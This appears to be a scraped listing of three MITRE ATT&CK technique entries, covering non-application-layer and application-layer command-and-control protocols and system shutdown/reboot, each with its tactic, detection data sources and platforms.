Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre